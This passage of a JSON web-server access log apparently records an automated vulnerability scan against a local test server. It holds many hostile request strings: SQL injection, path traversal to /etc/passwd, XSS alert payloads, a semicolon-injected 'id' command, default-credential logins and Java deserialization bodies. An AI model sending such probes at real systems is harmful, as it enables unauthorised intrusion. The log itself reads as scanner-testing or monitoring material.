HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /autoconfig HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dispatcher/invalidate.cache HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /m_login.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /data?get=prodServerGen HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:32 +0000","request_body":"{\x22user\x22:\x22admin\x22,\x22password\x22:\x22password\x22,\x22type\x22:\x22login\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ui/api/v1/ui/auth/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tmui/login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /snippets.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL+--+&searchColumn=snippetName&searchOption=contains HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ADSearch.cc?methodToCall=search HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-json/wp/v2/lesson/1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fuel/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /metrics HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:32 +0000","request_body":"loginUsername=admin&loginPassword=axis2","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /axis2-admin/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:32 +0000","request_body":"\xAC\xED\x00\x05sr\x00\x13java.util.ArrayListx\x81\xD2\x1D\x99\xC7a\x9D\x03\x00\x01I\x00\x04sizexp\x00\x00\x00\x02w\x04\x00\x00\x00\x02t\x00\x09element 1t\x00\x09element 2x","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /invoker/JMXInvokerServlet/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.../.../.../.../.../.../.../.../.../windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:32 +0000","request_body":"cat_id=4'&get_seleted_Category=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /homeaction.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /graphql?query=+{customerDownloadableProducts+{+items+{+date+download_url}}+} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /accounts/login/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/Attitude/go.php?https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x22&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=XXXXXXXXXXXX%3Cscript%3Ealert(31337)%3C%2Fscript%3E&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=OO HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/awstats/awredir.pl?url=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/autoconfig HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console/login/LoginForm.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=rsvp-admin-export HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dc2/admin/auth.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:32 +0000","request_body":"action=login&u=admin&p=admin256","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /service.web HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tmui/tmui/login/welcome.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:32 +0000","request_body":"login=branding&password=branding&Submit=Login","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /webadmin/auth/verification.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"http://127.0.0.1/webadmin/start/", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/tenants HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /httptrace HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/servlet/svnwebclient/changedResource.jsp?url=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.000","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:32 +0000","request_body":"userName=admin&password=axis2&submit=+Login+","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /axis2/axis2-admin/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:32 +0000","request_body":"\xAC\xED\x00\x05sr\x00\x13java.util.ArrayListx\x81\xD2\x1D\x99\xC7a\x9D\x03\x00\x01I\x00\x04sizexp\x00\x00\x00\x02w\x04\x00\x00\x00\x02t\x00\x09element 1t\x00\x09element 2x","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /invoker/EJBInvokerServlet/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:32 +0000","request_body":"\x0D\x0A \x0D\x0A HTTP://127.0.0.1/wsman/\x0D\x0A http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem\x0D\x0A \x0D\x0A http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous\x0D\x0A \x0D\x0A http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript\x0D\x0A 102400\x0D\x0A uuid:00B60932-CC01-0005-0000-000000010000\x0D\x0A PT1M30S\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A root/scx\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A aWQ=\x0D\x0A \x0D\x0A 0\x0D\x0A true\x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wsman HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.settings/rules.json?auth=FIREBASE_SECRET HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:32 +0000","request_body":"op_type=ping&destination=%3Bid","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /tools.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"http://127.0.0.1/tools.cgi", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.000","http_user_agent":"-", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /global-protect/login.esp?user=j%22;-alert(1)-%22x HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x22&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=AAA&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=XXXXXXXXXXXX%3Cscript%3Ealert(31337)%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /search.htm?searchstring2=&searchstring=%27%3E%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /user/login?redirect=%2F HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?page=/etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fw/mindex.do?url=./WEB-INF/web.xml%3f HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CFIDE/administrator/images/mx_login.gif HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mgmt/tm/sys/management-ip HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/hero-maps-pro/views/dashboard/index.php?v=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/status HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/httptrace HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/servlet/svnwebclient/commitGraph.jsp?%27)%3Balert(%22XSS HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /kvmlm2/index.dhtml?fname=&language=../../../../../../../../../../etc/passwd%00.jpg&lname=&sponsor=gdi&template=11 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plus/carbuyaction.php?dopost=return&code=../../ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 